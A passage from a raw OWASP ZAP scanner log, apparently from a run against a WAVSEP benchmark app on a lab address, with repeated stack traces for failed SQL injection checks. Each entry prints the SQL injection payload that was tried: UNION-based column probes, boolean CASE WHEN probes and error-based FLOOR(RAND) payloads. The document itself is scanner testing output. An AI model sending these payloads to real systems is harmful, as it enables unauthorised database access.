org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679833 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679833 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (8879=8879) THEN 8879 ELSE 8879*(SELECT 8879 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT (CASE WHEN (8879=8879) THEN 8879 ELSE 8879*(SELECT 8879 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679835 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679836 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (6639=3188) THEN 6639 ELSE 6639*(SELECT 6639 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT (CASE WHEN (6639=3188) THEN 6639 ELSE 6639*(SELECT 6639 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679839 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679840 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND (SELECT 8172 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(8172=8172,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (7465=7465] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND (SELECT 8172 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(8172=8172,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (7465=7465 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679843 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679844 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT 1123 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1123=1123,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT 1123 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1123=1123,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679845 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND (SELECT 5955 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5955=5955,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('lEjn'='lEjn] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND (SELECT 5955 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5955=5955,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('lEjn'='lEjn at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679847 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679848 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND (SELECT 3372 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(3372=3372,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'AOWP'='AOWP] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND (SELECT 3372 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(3372=3372,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'AOWP'='AOWP at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679848 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679850 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload 